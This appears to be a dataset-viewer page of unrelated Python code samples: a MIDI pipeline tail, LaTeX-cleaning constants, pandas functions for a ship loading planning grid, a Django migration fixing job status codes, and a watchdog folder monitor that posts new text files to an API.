    runtime = time.time() - pipeline_start
    print(f"MIDI pipeline runtime: {runtime / 60 : .1f}m")
    print(pipeline.encoded_sequences)
    exit()
# Run the pipeline only when executed as a script.
if __name__=="__main__":
    main()
|
########################
# Constants declaration
########################

# YOU SHOULD NOT MODIFY THIS FILE directly:
# use 'constants_perso' to declare your modifications.

# The placeholder tag inserted wherever content is discarded.
tag = '€'

# 1. List of LaTeX environments whose content will be discarded.
# Ex. \begin{equation} ... \end{equation} will be replaced by a tag.
# Ex. \begin{itemize} ... \end{itemize} is not listed, so its content is kept.
list_env_discard = ['equation',
                    'equation*',
                    'align',
                    'align*',
                    'lstlisting'
                    ]
# Add your personal environments in 'constants_perso.py'.

# 2. List of LaTeX commands whose whole invocation (command and argument)
# will be discarded.
# Ex. \usepackage[option]{class} will be replaced by a tag.
# Ex. \emph{my text} is not listed, so its content is kept.
list_cmd_arg_discard = ['usepackage',
                        'documentclass',
                        'begin',
                        'end',
                        'includegraphics',
                        'label',
                        'ref',
                        'cite'
                        ]
# Add your personal commands in 'constants_perso.py'.
|
import pandas as pd
def planning(df):
    """Pivot the loadings DataFrame into a ship x day-of-week planning grid.

    Each cell describes one loading: location, reference, weight, volume,
    product, discharge location and supplier.
    NOTE(review): mutates the caller's DataFrame in place (adds/overwrites
    'loadDate', 'dayofweek' and 'new' columns).
    """
    # Keep only the date part (YYYY-MM-DD) of the load timestamp.
    df['loadDate'] = df['loadDate'].str[:10]
    # Column labels like '2021-01-04 Monday'.
    df['dayofweek'] = list(df['loadDate'].map(str) + " "
                           + pd.to_datetime(df['loadDate'], format='%Y-%m-%d').dt.day_name())
    # Human-readable one-line description of each loading.
    new = list(df['loadlocation'].map(str) + " " + df['loadingReference'].map(str) + " " + df['weight'].map(str) +
               "mt" + " " + df['volume'].map(str) + "m3" + " " + df['product'].map(str) + "-" +
               df['dischargeLocation'].map(str) + " " + df['loadingReference'].map(str) + "(" +
               df['supplier'].map(str) + ")")
    df['new'] = new
    # pivot() requires unique (ship, dayofweek) pairs.
    df = df.drop_duplicates(subset=["ship", "dayofweek"])
    planning_result = df.pivot(index='ship', columns='dayofweek')['new']
    return planning_result
def status(df):
    """Build a per-ship status table: ship, operator and a readable status line."""
    # .copy() so the assignments below write into an independent frame
    # instead of a view of the caller's DataFrame (previously triggered
    # pandas' SettingWithCopyWarning and risked silent no-op writes).
    status = df[['ship', 'operator', 'current_location', 'current_status', 'eta', 'ata']].copy()
    # '2021-01-01T10:00:00' -> '2021-01-01 10:00'
    status['eta'] = status['eta'].str.replace("T", " ").str[:16]
    status['ata'] = status['ata'].str.replace("T", " ").str[:16]
    status = status.drop_duplicates()
    status['status'] = list(status['current_location'].map(str) + " " + status['current_status'].map(str) + " ETA: "
                            + status['eta'].map(str) + " ATA: "
                            + status['ata'].map(str))
    status_result = status[['ship', 'operator', 'status']]
    return status_result
def sylvanator(csv_file):
    """Load the loadings CSV and merge the planning grid with ship status.

    Returns the planning pivot with the ship/operator/status columns moved
    to the front.  NOTE(review): the reordering below is positional and
    assumes at least six day-of-week columns in the pivot -- fragile for
    small input files.
    """
    df = pd.read_csv(csv_file)
    plan = planning(df)
    state = status(df)
    sylvanator = plan.merge(state, how='left', left_on='ship', right_on="ship")
    sylvanator = sylvanator[
        [sylvanator.columns[0], sylvanator.columns[-2], sylvanator.columns[-1], sylvanator.columns[1], sylvanator.columns[2],
         sylvanator.columns[3], sylvanator.columns[4], sylvanator.columns[5]]]
    return sylvanator
|
# Generated by Django 4.0.1 on 2022-03-02 08:20
from django.db import migrations
def UpdateJobStatus(apps, schema_editor):
    """A bug resulted in the human readable choices values for Job.status being saved in the
    database. This migration updates all existing job records to ensure that the correct
    values are present.
    """
    Job = apps.get_model("main", "Job")
    mapping = {"Completed": "C", "Queueing": "Q", "Running": "R"}
    for job in Job.objects.all():
        # Values that are already short codes (or anything unmapped) are
        # left untouched; every record is saved, as before.
        job.status = mapping.get(job.status, job.status)
        job.save()
class Migration(migrations.Migration):
    # Data-only migration: normalizes existing Job.status values via
    # UpdateJobStatus.  No reverse function is supplied, so this migration
    # cannot be unapplied.
    dependencies = [
        ("main", "0013_auto_20210810_2154"),
    ]
    operations = [migrations.RunPython(UpdateJobStatus)]
|
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
from pathlib import Path
import json
from request_appi import AppiResponseMonitor
class MonitorVentas(PatternMatchingEventHandler, Observer):
    """Watchdog observer that reacts to files created in a directory.

    Combines the event handler and the observer in one object: the instance
    schedules itself as its own handler for the watched path.
    """

    def __init__(self, path='.', patterns='*', logfunc=print):
        # Explicit base-class __init__ calls (no super()): the two watchdog
        # bases have unrelated signatures.
        PatternMatchingEventHandler.__init__(self, patterns)
        Observer.__init__(self)
        self.schedule(self, path=path, recursive=False)
        self.log = logfunc

    def on_created(self, event):
        # This function is called when a file is created
        path = Path(event.src_path)
        if path.suffix == ".txt":
            # Runtime log message intentionally in Spanish ("Added!").
            self.log(f"{path.name} ¡Agregado!")
            # self.load_json(path)
            # Forward the new file to the API and echo its response.
            response_api = AppiResponseMonitor(path).send()
            print(response_api)

    # def load_json(self, ruta):
    #     f = open(ruta, "r")
    #     content = f.read()
    #     jsondecoded = json.loads(content)
    #     for key, value in jsondecoded.items():
    #         print(f"{key}: {value}")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.